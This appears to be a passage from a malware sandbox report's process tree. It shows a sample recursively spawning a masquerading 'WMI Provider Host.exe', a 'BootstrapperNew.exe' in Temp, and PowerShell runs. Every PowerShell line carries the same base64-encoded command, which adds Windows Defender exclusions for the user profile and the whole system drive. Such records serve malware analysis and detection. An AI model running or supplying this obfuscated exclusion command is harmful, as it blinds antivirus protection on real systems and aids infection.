        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        119⤵
        
        PID:4940
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        119⤵
        
        PID:6088
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        119⤵
        
        PID:3060
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        120⤵
        
        PID:5400
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        120⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        120⤵
        
        PID:6416
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        121⤵
        
        PID:5616
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        121⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        121⤵
        
        PID:4860
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        122⤵
        
        PID:5792
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        122⤵
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        122⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        123⤵
        
        PID:1516
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        123⤵
        
        PID:3112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        123⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        124⤵
        
        PID:7740
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        124⤵
        
        PID:7752
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        124⤵
        
        PID:7824
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        125⤵
        
        PID:8052
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        125⤵
        
        PID:8104
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        125⤵
        
        PID:8148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        126⤵
        
        PID:6080
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        126⤵
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        126⤵
        
        PID:216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        127⤵
        
        PID:7052
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        127⤵
        
        PID:7124
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        127⤵
        
        PID:1396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        128⤵
        
        PID:7596
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        128⤵
        
        PID:1816
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        128⤵
        
        PID:6932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        129⤵
        
        PID:7336
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        129⤵
        
        PID:8020
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        129⤵
        
        PID:5412
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        130⤵
        
        PID:2704
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        130⤵
        
        PID:5516
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        130⤵
        
        PID:7252
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        131⤵
        
        PID:6164
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        131⤵
        
        PID:2664
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        131⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        132⤵
        
        PID:7428
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        132⤵
        
        PID:7220
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        132⤵
        
        PID:7280
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        133⤵
        
        PID:2440
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        133⤵
        
        PID:7956
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        133⤵
        
        PID:7920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        134⤵
        
        PID:3244
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        134⤵
        
        PID:7244
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        134⤵
        
        PID:6380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        135⤵
        
        PID:5608
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        135⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        135⤵
        
        PID:6992
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        136⤵
        
        PID:972
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        136⤵
        
        PID:7476
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        136⤵
        
        PID:7724
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        137⤵
        
        PID:6836
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        137⤵
        
        PID:6324
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        137⤵
        
        PID:5096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        138⤵
        
        PID:1320
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        138⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        138⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        139⤵
        
        PID:5728
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        139⤵
        
        PID:2744
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        139⤵
        
        PID:7160
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        140⤵
        
        PID:7236
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        140⤵
        
        PID:8112
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        140⤵
        
        PID:8168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        141⤵
        
        PID:328
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        141⤵
        
        PID:2540
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        141⤵
        
        PID:4620
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        142⤵
        
        PID:8044
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        142⤵
        
        PID:3632
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        142⤵
        
        PID:2532
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        143⤵
        
        PID:5912
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        143⤵
        
        PID:7888
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        143⤵
        
        PID:6536
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        144⤵
        
        PID:4996
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        144⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        144⤵
        
        PID:4076
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        145⤵
        
        PID:6776
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        145⤵
        
        PID:6068
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        145⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        146⤵
        
        PID:4684
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        146⤵
        
        PID:2548
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        146⤵
        
        PID:5148
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        147⤵
        
        PID:756
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        147⤵
        
        PID:2952
        
